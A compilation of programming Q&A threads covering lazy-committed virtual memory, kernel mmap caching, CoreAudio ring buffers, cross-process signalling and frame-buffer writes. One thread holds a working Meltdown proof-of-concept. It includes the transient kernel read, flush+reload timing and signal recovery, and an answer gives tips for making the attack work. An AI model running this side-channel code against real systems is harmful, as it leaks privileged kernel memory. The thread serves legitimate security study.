I'm running a firmware simulation in a DLL which has simulated NAND (256MB or 1GB). I want to avoid allocating memory for this on the heap and instead allocate using virtual memory.
The memory initially needs to be cleared to 0xFF (like NAND is). However I don't want to pay for that initialization (nor commit un-accessed pages). So ideally it should only allocate upon access. And I do not need to retain the data following exit of the simulation.
Initial ideas are:
1) VirtualAlloc. I'm not sure, but perhaps I could use a guard page and trap the exception on first access. Is it a good idea for a DLL to handle such SEH exceptions, or is there a better way?
2) Create a big file that's initialized to 0xFF, then map a view of the file with copy-on-write.
Does anyone know if it is possible to create a file with a callback for providing the initial data?
I think 1) is probably the way to go, but I'm wondering whether it's really the best option.
3) I've come up with another method that can avoid exception handler and also avoids creating a huge file:
Create a file the same size as dwAllocationGranularity (typically 64 KiB) and fill it with 0xFF. Then create multiple copy-on-write views of it in contiguous memory using MapViewOfFileEx + FILE_MAP_COPY (after an initial VirtualAlloc/VirtualFree to find a base address where we can hope to place adjacent views). I need to test this more fully; I have a slight concern about potential thread races. I'm only using a single thread myself, but the CRT starts a few too.
This means that any code that only reads the virtual NAND also does not result in all pages getting committed.

Yes, basically 1) is the best solution. I would only make two changes. First, use VEH instead of SEH: an SEH handler is called only if the access happens inside the code it guards, whereas a VEH handler is called for an access from any context and any thread. Second, instead of a guard page, initially only reserve the region without committing anything. Any access to the region then raises an exception, which you handle in the VEH by committing the page and filling it with the 0xFF pattern. Demo code:
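// Requires <windows.h> plus declarations for the ntdll routines used below.
PVOID g_NandBegin;
SIZE_T g_NandSize = 0x1000000;

// Vectored handler: on first touch, commit the faulting page and fill it with 0xFF.
LONG NTAPI Vex(::PEXCEPTION_POINTERS ExceptionInfo) {
    ::PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord;
    if (ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION &&
        ExceptionRecord->NumberParameters > 1) {
        PVOID pv = (PVOID)ExceptionRecord->ExceptionInformation[1]; // faulting address
        if ((ULONG_PTR)pv - (ULONG_PTR)g_NandBegin < g_NandSize) {
            SIZE_T RegionSize = 1; // rounded up to a whole page by the call
            if (0 <= NtAllocateVirtualMemory(NtCurrentProcess(), &pv, 0, &RegionSize, MEM_COMMIT, PAGE_READWRITE)) {
                RtlFillMemoryUlong(pv, RegionSize, MAXULONG);
                return EXCEPTION_CONTINUE_EXECUTION; // retry the faulting access
            }
        }
    }
    return EXCEPTION_CONTINUE_SEARCH; // not ours
}

void dc() {
    if (PVOID pv = AddVectoredExceptionHandler(TRUE, Vex)) {
        if (g_NandBegin = VirtualAlloc(0, g_NandSize, MEM_RESERVE, PAGE_READWRITE)) {
            ULONG seed = ~GetTickCount();
            int n = 0x100;
            do { // read random bytes; each must come back as 0xFF
                if (*(UCHAR*)((PBYTE)g_NandBegin + (((ULONG64)RtlRandomEx(&seed) * g_NandSize) >> 32)) != 0xFF)
                    __debugbreak();
            } while (--n);
            VirtualFree(g_NandBegin, 0, MEM_RELEASE);
        }
        RemoveVectoredExceptionHandler(pv);
    }
}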
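Two small idioms carry the handler in the demo: the single unsigned comparison that tests "is the faulting address inside the region", and the rounding of that address down to its page. A portable sketch of both follows; the function names are made up for illustration, and the page size is passed in as a parameter instead of being queried from the OS.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* True when addr lies in [base, base + size). If addr < base the unsigned
 * subtraction wraps to a huge value, so one comparison covers both bounds. */
static bool in_region(uintptr_t addr, uintptr_t base, size_t size)
{
    return addr - base < size;
}

/* Start of the page containing addr; page_size must be a power of two. */
static uintptr_t page_base(uintptr_t addr, size_t page_size)
{
    return addr & ~((uintptr_t)page_size - 1);
}
```

With a 4 KiB page, `page_base(0x12345, 0x1000)` gives `0x12000`, which is the kind of rounding the commit call applies to the faulting address when asked for a 1-byte region.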


MMAP buffer kernel writes are not seen by user space

I have a kernel driver which shares a buffer with the user-space layer.
Everything seemed to work fine in my VM prototype (Ubuntu, kernel 5.4), but when I moved my code to the target (same kernel, but an embedded distro) I can clearly see that kernel writes to the buffer (using memcpy or memset) are not reflected on the user-space side of the buffer.
Note that I use direct buffer accesses on both sides. There is no concurrency issue: the kernel writes first, then user space reads.
I ended up believing this is a cache issue ... as the same code works perfectly in my VM.
The buffer size is 4 * PAGE_SIZE.
It is allocated as follows:
int _size = (SFP_BUFFER_SIZE + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
input_buffer = (char*) kzalloc (_size, GFP_KERNEL); // aligned on page boundary
if (!input_buffer) {
    dev_dbg(&dev, "open/ENOMEM (input_buffer)\n");
    status = -ENOMEM;
    goto err_all;
}
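The size computation at the top of that snippet is the usual "round up to a whole number of pages" mask trick. As a standalone sketch (the function name is hypothetical, and the page size is passed in because PAGE_SIZE is a kernel macro):

```c
#include <stddef.h>

/* Round size up to the next multiple of page_size.
 * Only valid when page_size is a power of two. */
static size_t round_up_to_page(size_t size, size_t page_size)
{
    return (size + (page_size - 1)) & ~(page_size - 1);
}
```

For a buffer that is already 4 * PAGE_SIZE, as here, the rounding leaves the size unchanged.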
When mmap'ing, I used the following code pattern:
vma->vm_ops = &fpgadrv_vm_ops;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
pfn = virt_to_phys((void*)(input_buffer)) >> PAGE_SHIFT;
if (remap_pfn_range (vma, vma->vm_start, pfn, size, vma->vm_page_prot)) {
    printk(KERN_DEBUG "remap page range failed\n");
    return -EAGAIN;
}
Both the user-space code and the kernel code use memcpy to update the buffer. Note also that I cannot use the write/read entry points, as they are already used for very specific operations.
The user code is calling mmap as follows:
buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, device_fd, 0);
if (buf == MAP_FAILED) {
    perror("USERDRV:cannot mmap");
    return -1; // for testing, ignore the return code and continue
}
and upon IOCTL call, the kernel would fill up the mmap buffer as follows:
// reset the buffer (zero + put back the signature)
memset(input_buffer, 0xA5, SFP_BUFFER_SIZE);
memcpy((void*)(input_buffer), (void*)signature, 10);
Is there something more I should do to make sure the pages are not cached (assuming this is the cause of my problem)?

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
    char* key_val = "abcd";
    printk("Secret data address = %p\n", key_val);
    printk("Value at %p = %s\n", key_val, key_val);
    return 0;
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
    char data = *(char*) kernel_addr; //Raises exception
    array[data*4096+DELTA] += 10; // <----- Execute out of order
    return 0;
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 + DELTA) while executing out of order. After this, the permission check on the kernel address fails and SIGSEGV is raised.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
    register uint64_t time1, time2;
    volatile uint8_t *addr;
    int min = 10000;
    unsigned int temp; // __rdtscp expects an unsigned int *
    int i, k = -1;
    for (i = 0; i < 256; i++) {
        time1 = __rdtscp(&temp); //timestamp before memory access
        temp = array[i*4096 + DELTA];
        time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
        if (time2 <= min) { // remember the fastest (cached) slot
            min = time2;
            k = i;
        }
    }
    printf("array[%d*4096+DELTA]\n", k);
}
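Stripped of the timing itself, the decode step is an argmin over 256 latency samples, plus the mapping from a byte value to its probe slot. A small sketch of just that logic is below; the names are mine, and the delta value is a parameter because DELTA's definition is not shown in the question. One detail worth noticing: `char` is signed on typical x86 compilers, so `data*4096` goes negative for bytes of 0x80 and above unless the byte is treated as unsigned, which the sketch does.

```c
#include <stddef.h>
#include <stdint.h>

/* Probe-array offset for a leaked byte, treating the byte as unsigned. */
static size_t probe_index(uint8_t byte, size_t delta)
{
    return (size_t)byte * 4096 + delta;
}

/* Index of the smallest latency sample, or -1 when n is 0.
 * The first minimum wins on ties. */
static int fastest_slot(const uint64_t *cycles, size_t n)
{
    int best = -1;
    uint64_t min = UINT64_MAX;
    for (size_t i = 0; i < n; i++) {
        if (cycles[i] < min) {
            min = cycles[i];
            best = (int)i;
        }
    }
    return best;
}
```

In a real run you would probably collect the samples over many attempts and count hits per slot, since a single pass is easily disturbed by noise.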
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
The possible reasons I could think of are:
1. The instruction caching the array element is not getting executed out of order.
2. Out of order execution is occurring but the cache is being flushed.
3. I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect.
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
    int i, k = -1, temp;
    uint64_t diff;
    volatile uint8_t *addr;
    double min = 10000000;
    struct timespec start, end;
    for (i = 0; i < 256; i++) {
        addr = &array[i*4096 + DELTA];
        clock_gettime(CLOCK_MONOTONIC, &start);
        temp = *addr;
        clock_gettime(CLOCK_MONOTONIC, &end);
        diff = end.tv_nsec - start.tv_nsec;
        if (diff < min) { // remember the fastest (cached) slot
            min = diff;
            k = i;
        }
    }
    printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
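One thing to watch in the clock_gettime variant: subtracting only tv_nsec goes wrong whenever the two samples straddle a second boundary, and because diff is a uint64_t the negative result wraps to a huge value. A sketch of an interval helper that includes tv_sec (the name `elapsed_ns` is made up):

```c
#include <stdint.h>
#include <time.h>

/* Nanoseconds from *start to *end, including the seconds field. */
static int64_t elapsed_ns(const struct timespec *start, const struct timespec *end)
{
    return (int64_t)(end->tv_sec - start->tv_sec) * 1000000000LL
         + (end->tv_nsec - start->tv_nsec);
}
```

This only fixes the arithmetic; the call overhead of clock_gettime is still large compared with the cache hit/miss difference being measured.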
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
    char kernel_data;
    asm volatile(
        ".rept 1000;"
        "add $0x01, %%eax;"
        ".endr;"
        :
        :
        : "eax"
    );
    kernel_data = *(char*)kernel_addr;
    array[kernel_data*4096 + DELTA] +=10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
    // Cache the data to improve success
    int fd = open("/proc/my_secret_key", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }
    int ret = pread(fd, NULL, 0, 0); //Data is cached
    char data = *(char*) kernel_addr; //Raises exception
    array[data*4096+DELTA] += 10; // <----- Out of order
    return 0;
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
    int i;
    for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
    for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void catch_segv(){
    siglongjmp(jbuf, 1);
}

int main(){
    unsigned long kernel_addr = 0xfa2ef024;
    signal(SIGSEGV, catch_segv);
    flushChannel();
    if(sigsetjmp(jbuf, 1)==0){
        // meltdown(kernel_addr);
        meltdown_busy_loop(kernel_addr);
    } else {
        printf("Memory Access Violation\n");
    }
    attackChannel_x86();
    return 0;
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.)

What's the correct method for CoreAudio realtime thread to communicate with UI thread?

I need to pass data between CoreAudio's realtime thread and the UI thread (one way, RT->UI). I know I can't use any Cocoa/Objective C methods like performSelectorOnMainThread or NSNotification and I can't use anything that will allocate memory as this will potentially block the RT thread.
What is the correct method for communicating between threads? Can I use GCD message queues or is there a more basic system to use?
Thinking about this a bit more, I suppose I could use a lock free ring buffer, which the RT thread puts a message into, and the UI thread checks for messages to pull out. Is this the best way and if so is there a system already to do this in CoreAudio or available elsewhere or do I need to code it up myself?
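To make the idea concrete, here is a minimal single-producer/single-consumer ring buffer sketched with C11 atomics. It is not CoreAudio or PortAudio API; the type and function names, the message layout and the capacity of 32 are all illustrative assumptions. It only works with exactly one writer thread (the RT thread) and one reader thread (the UI thread), and neither side allocates or takes a lock.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

#define RB_CAPACITY 32              /* must be a power of two */

typedef struct {                    /* hypothetical message layout */
    int type;
    unsigned long position;
} Msg;

typedef struct {
    Msg slots[RB_CAPACITY];
    atomic_size_t head;             /* next slot to read; written by the consumer only */
    atomic_size_t tail;             /* next slot to write; written by the producer only */
} SpscRing;                         /* zero-initialise before use */

/* Producer side (RT thread): returns false instead of blocking when full. */
static bool ring_push(SpscRing *rb, Msg m)
{
    size_t tail = atomic_load_explicit(&rb->tail, memory_order_relaxed);
    size_t head = atomic_load_explicit(&rb->head, memory_order_acquire);
    if (tail - head == RB_CAPACITY)
        return false;
    rb->slots[tail & (RB_CAPACITY - 1)] = m;
    /* Release: the slot contents become visible before the new tail does. */
    atomic_store_explicit(&rb->tail, tail + 1, memory_order_release);
    return true;
}

/* Consumer side (UI thread): returns false when there is nothing to read. */
static bool ring_pop(SpscRing *rb, Msg *out)
{
    size_t head = atomic_load_explicit(&rb->head, memory_order_relaxed);
    size_t tail = atomic_load_explicit(&rb->tail, memory_order_acquire);
    if (head == tail)
        return false;
    *out = rb->slots[head & (RB_CAPACITY - 1)];
    atomic_store_explicit(&rb->head, head + 1, memory_order_release);
    return true;
}
```

When the buffer is full the RT thread simply drops the message, which for position updates is usually acceptable; the UI side can drain with `while (ring_pop(&rb, &msg))` from a timer.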
It turns out this was a lot simpler than I expected and the solution I came up with was just to use the Portaudio ring buffer. I needed to add pa_ringbuffer.[ch] and pa_memorybarrier.h to my project and then define a MessageData structure to store in the ring buffer.
typedef struct MessageData {
MessageType type;
union {
struct {
NSUInteger position;
} position;
} data;
} MessageData;
Then I allocated some space to store 32 messages and created the ring buffer.
_playbackData->RTToMainBuffer = malloc(sizeof(MessageData) * 32);
PaUtil_InitializeRingBuffer(&_playbackData->RTToMainRB, sizeof(MessageData),
32, _playbackData->RTToMainBuffer);
Finally I started an NSTimer for every 20ms to pull data from the ring buffer
while (PaUtil_GetRingBufferReadAvailable(&_playbackData->RTToMainRB)) {
    MessageData *dataPtr1, *dataPtr2;
    ring_buffer_size_t sizePtr1, sizePtr2;
    // Should we read more than one at a time?
    if (PaUtil_GetRingBufferReadRegions(&_playbackData->RTToMainRB, 1,
                                        (void *)&dataPtr1, &sizePtr1,
                                        (void *)&dataPtr2, &sizePtr2) != 1) {
        break; // nothing readable after all; try again on the next timer tick
    }
    // Parse message
    switch (dataPtr1->type) {
        case MessageTypeEOS:
            // handle end of stream here
            break;
        case MessageTypePosition:
            // handle dataPtr1->data.position.position here
            break;
    }
    PaUtil_AdvanceRingBufferReadIndex(&_playbackData->RTToMainRB, 1);
}
Then in the realtime thread, pushing a message to the ringbuffer was simply
MessageData *dataPtr1, *dataPtr2;
ring_buffer_size_t sizePtr1, sizePtr2;
if (PaUtil_GetRingBufferWriteRegions(&data->RTToMainRB, 1,
                                     (void *)&dataPtr1, &sizePtr1,
                                     (void *)&dataPtr2, &sizePtr2)) {
    dataPtr1->type = MessageTypePosition;
    dataPtr1->data.position.position = currentPosition;
    PaUtil_AdvanceRingBufferWriteIndex(&data->RTToMainRB, 1);
}
A ringbuffer is a good solution. Two if you need to communicate both ways ie. inbox/outbox message passing.
This is a good implementation for iOS/Mac if you don't want to use Portaudio.

How to make a fast context switch from one process to another?

I need to run unsafe native code in a sandbox process, and I need to reduce the cost of switching between processes. Both processes (controller and sandbox) share two auto-reset events and a coherent view of a mapped file (shared memory) that is used for communication.
To make this article smaller, I removed initializations from sample code, but the events are created by the controller, duplicated using DuplicateHandle, and then sent to sandbox process prior to work.
Controller source:
void inSandbox(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
    int before = *shared;
    for (int i = 0; i < 100000; ++i) {
        // Notify sandbox of a new request and wait for answer.
        SignalObjectAndWait(hNewRequest, hAnswer, INFINITE, FALSE);
    }
    assert(*shared == before + 100000);
}

void inProcess(volatile int *shared) {
    int before = *shared;
    for (int i = 0; i < 100000; ++i) {
        newRequest(shared);
    }
    assert(*shared == before + 100000);
}

void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}
Sandbox source:
void sandboxLoop(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
    // Wait for the first request from controller.
    assert(WaitForSingleObject(hNewRequest, INFINITE) == WAIT_OBJECT_0);
    for(;;) {
        // Perform request.
        newRequest(shared);
        // Notify controller and wait for next request.
        SignalObjectAndWait(hAnswer, hNewRequest, INFINITE, FALSE);
    }
}

void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}
inSandbox() - 550ms, ~350k context switches, 42% CPU (25% kernel, 17% user).
inProcess() - 20ms, ~2k context switches, 55% CPU (2% kernel, 53% user).
The machine runs Windows 7 Pro on a Core 2 Duo P9700 with 8 GB of memory.
An interesting fact is that sandbox solution uses 42% of CPU vs 55% of in-process solution. Another noteworthy fact is that sandbox solution contains 350k context switches, which is much more than the 200k context switches that we can infer from source code.
I need to know if there's a way to reduce the overhead of transferring control to another process. I already tried using pipes instead of events, and it was much worse. I also tried using no event at all, by making the sandbox call SuspendThread(GetCurrentThread()) and making the controller call ResumeThread(hSandboxThread) on every request, but the performance was similar to using events.
If you have a solution that uses assembly (like performing a manual context switch) or Windows Driver Kit, please let me know as well. I don't mind having to install a driver to make this faster.
I heard that Google Native Client does something similar, but I only found this documentation. If you have more information, please let me know.
The first thing to try is raising the priority of the waiting thread. This should reduce the number of extraneous context switches.
Alternatively, since you're on a 2-core system, using spinlocks instead of events would make your code much much faster, at the cost of system performance and power consumption:
void inSandbox(volatile int *lock, volatile int *shared)
{
    int i, before = *shared;
    for (i = 0; i < 100000; ++i) {
        *lock = 1;              // hand the request to the sandbox
        while (*lock != 0) { }  // spin until it has been served
    }
    assert(*shared == before + 100000);
}
void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}
void sandboxLoop(volatile int *lock, volatile int * shared)
{
    for(;;) {
        while (*lock != 1) { }  // spin until a request arrives
        newRequest(shared);
        *lock = 0;              // signal completion
    }
}
In this scenario, you should probably set thread affinity masks and/or lower the priority of the spinning thread so that it doesn't compete with the busy thread for CPU time.
Ideally, you'd use a hybrid approach. When one side is going to be busy for a while, let the other side wait on an event so that other processes can get some CPU time. You could trigger the event a little ahead of time (using the spinlock to retain synchronization) so that the other thread will be ready when you are.
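The spinning half of such a hybrid could look roughly like the sketch below: spin for a bounded number of iterations, and let the caller fall back to a blocking wait on the event if the flag has not changed by then. The function name and the spin budget are assumptions, and I've used C11 atomics here instead of plain volatile so the compiler and CPU ordering is explicit.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Spin until *flag equals expected, for at most max_spins polls.
 * Returns true if the value was observed, false if the budget ran out,
 * in which case the caller would block on the event instead. */
static bool spin_until(atomic_int *flag, int expected, unsigned max_spins)
{
    for (unsigned i = 0; i < max_spins; i++) {
        if (atomic_load_explicit(flag, memory_order_acquire) == expected)
            return true;
    }
    return false;
}
```

In the controller this would replace the bare `while (*lock != 0) { }`: try `spin_until(lock, 0, budget)` first and only call WaitForSingleObject on the answer event when it returns false. A sensible budget has to be measured on the target machine.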

How to directly write to the frame buffer in windows driver

I am writing a driver that writes data directly to the frame buffer, so that I can show a secret message on the screen while applications in user space can't read it. Below is my code that tries to write a value to the frame buffer, but after the write, the values I read back from the frame buffer are all 0.
I am puzzled. Does anyone know the reason? Or does anyone know how to display a message on the screen such that user-space applications can't get its content? Thanks a lot!
#define BUFFER_SIZE 0x20000
void showMessage()
{
    int i;
    int *vAddr;
    PHYSICAL_ADDRESS pAddr;
    pAddr.QuadPart = 0xA0000; // assumed base: the legacy video window at 0xA0000
    vAddr = (int *)MmMapIoSpace(pAddr, BUFFER_SIZE, MmNonCached);
    if (vAddr == NULL)
        return;
    KdPrint(("Virtual address is %p", vAddr));
    for(i = 0; i < BUFFER_SIZE / 4; i++)
        vAddr[i] = 0x11223344;
    for(i = 0; i < 0x80; i++)
        KdPrint(("Value: %d", vAddr[i])); // output are all zero
    MmUnmapIoSpace(vAddr, BUFFER_SIZE);
}
You must map the shared memory during device start up. I assume that showMessage isn't called during the start up. See more here.
Regarding displaying message on the screen - it must involve user-space interaction since GUI is a user-space component. I suppose you could notify some GUI listener without other applications involvement.
Memory mapped IO isn't designed to act exactly like memory (retrieving data that is placed there in the same form it was stored). The writes into the 0xA0000+ range are writes into PORTS in the video device's IO space (from its perspective); So long as the appropriate writes result in the appropriate pixels lighting up, then the video device has done its job from the perspective of people that write drivers for screen rendering (or old DOS code where memory was a free-for-all without a user-space/kernel-space division). But such code never had a need to store data that would later be retrieved from the video segment. Therefore typical memory semantics would generally not have been implemented (waste of hardware and effort). Here, these randoms talk about it:
Magic number with MmMapIoSpace
